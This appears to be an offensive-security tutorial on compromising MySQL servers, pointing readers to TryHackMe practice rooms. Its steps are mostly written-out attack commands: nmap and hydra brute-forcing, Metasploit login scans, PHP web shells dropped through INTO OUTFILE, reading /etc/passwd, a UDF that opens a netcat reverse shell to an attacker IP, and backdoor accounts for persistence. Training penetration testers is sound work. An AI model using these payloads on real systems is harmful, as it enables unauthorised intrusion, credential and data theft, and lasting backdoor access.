Breaking into MySQL:

MySQL is one of the most popular relational databases in the world—and often overlooked as a foothold during penetration tests. With poor configurations, weak credentials, and overly permissive access, MySQL can go from backend database to full system compromise.

Let’s walk through how to discover, enumerate, exploit, and post-exploit MySQL like a true offensive operator.

1. What is MySQL?

MySQL is an open-source relational database management system (RDBMS) that uses SQL (Structured Query Language) for managing data. It’s commonly used in web applications and can be a gateway to sensitive user data, internal logic, and sometimes even system shells.

🔑 Key Details:

Default Port: 3306 (TCP)
Auth Methods: Username + password (local or remote)
Common Weaknesses:
- Default credentials (root:root, root:mysql)
- Remote root login enabled
- SQL Injection leading to credential extraction
- File read/write from within SQL queries
- Privilege escalation via UDFs or OS interaction

2. Scanning for MySQL

Nmap

nmap -p 3306 -sV <target>

Nmap Script Scan

nmap -p 3306 --script mysql-info,mysql-users,mysql-databases,mysql-empty-password,mysql-brute <target>

mysql-info: Gets MySQL server version and protocol details.
mysql-empty-password: Tests for empty passwords.
mysql-brute: Performs a dictionary attack.
mysql-users: Enumerates valid usernames (if allowed).
mysql-databases: Tries to list databases (rare unless anonymous or creds are known).

3. MySQL Enumeration

Using Metasploit

use auxiliary/scanner/mysql/mysql_version
use auxiliary/scanner/mysql/mysql_login

set USERNAME root
set PASSWORD root
set RHOSTS <target>
run

Using `mysql` CLI

mysql -h <target> -u root -p

If successful, enumerate:

SHOW DATABASES;
SELECT user, host, authentication_string FROM mysql.user;

Using `hydra`

hydra -L users.txt -P passwords.txt -s 3306 <target> mysql

4. Exploiting MySQL

Let’s weaponize access.

Default or Weak Credentials

Still common in dev/staging environments:

mysql -h <target> -u root -p

Try no password first.

SQL Injection → MySQL Access

If a web app uses MySQL and is vulnerable to SQLi:

Extract usernames/hashes
Write files to disk via: SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php';

File Read/Write (With `FILE` Privilege)

If you can log in and have FILE privileges:

SELECT LOAD_FILE('/etc/passwd');

Or drop a web shell:

SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/backdoor.php';

User-Defined Functions (UDF) for RCE

If you can write to plugin directories and have root MySQL:

Upload a malicious .so file (Linux) or .dll (Windows)
Load as a UDF:

CREATE FUNCTION do_system RETURNS INTEGER SONAME 'lib_mysqludf_sys.so';
SELECT do_system('nc -e /bin/bash <attacker-ip> <port>');

Escaping the Database

Check for root access inside MySQL:

SELECT user(), current_user(), version();

If you can ! execute shell commands (older/rare), it’s over.

5. Post-Exploitation

Data Exfiltration

Dump all users and hashes:

SELECT user, host, authentication_string FROM mysql.user;

Dump tables:

USE <database>;
SHOW TABLES;
SELECT * FROM <table>;

Privilege Escalation

Check for stored procedures with dangerous functionality
Abuse GRANT privileges to create more users:

GRANT ALL PRIVILEGES ON *.* TO 'hacker'@'%' IDENTIFIED BY 'hackme' WITH GRANT OPTION;

Persistence

Create a user with remote access from anywhere:

CREATE USER 'evil'@'%' IDENTIFIED BY 'p@ssw0rd';
GRANT ALL PRIVILEGES ON *.* TO 'evil'@'%';

Set up triggers or scheduled events to reinfect if cleaned

Clean Up

Remove any files dropped (e.g., shells, UDFs)
Drop any backdoor users or procedures

TryHackMe Rooms to Practice MySQL Attacks

Injection – Great for SQLi basics that lead into DB access
Relevant – Has a MySQL privilege escalation vector
Mr Robot – Data dumping after web exploitation

Final Thoughts

MySQL isn’t just a backend—it can be a wide-open gateway into the system. With access, you’re often just one clever query away from file access, shell, or full system takeover. If you spot port 3306, treat it with curiosity and caution—especially if you’re facing a misconfigured root login.